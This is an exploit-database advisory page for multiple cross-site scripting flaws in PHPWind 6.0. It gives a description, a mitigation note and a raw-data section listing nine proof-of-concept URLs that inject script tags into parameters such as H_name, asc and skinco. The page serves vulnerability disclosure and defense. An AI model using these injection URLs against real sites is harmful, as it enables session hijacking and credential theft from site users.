header-logo
Suggest Exploit
vendor:
PHPWind
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: PHPWind
Affected Version From: PHPWind 6.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:phpwind:phpwind:6.0
Metasploit:
Other Scripts:
Platforms Tested:

PHPWind Multiple Cross-Site Scripting Vulnerabilities

PHPWind is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied input before using it in web application responses.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38867/info

PHPWind is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PHPWind 6.0 is vulnerable; other versions may also be affected. 


http://www.example.com/hack.php?H_name=bank"><script>alert(/Liscker/);</script>
http://www.example.com/search.php?asc=desc"><script>alert(/Liscker/);</script>
http://www.example.com/read.php?nowtime="><script>alert(/Liscker/);</script>
http://www.example.com/post.php?fid=10"><script>alert(/Liscker/);</script>
http://www.example.com/profile.php?action=forumright"><script>alert(/Liscker/);</script>
http://www.example.com/thread.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/message.php?action=scout"><script>alert(/Liscker/);</script>
http://www.example.com/sort.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/userpay.php?skinco=black"><script>alert(/Liscker/);</script>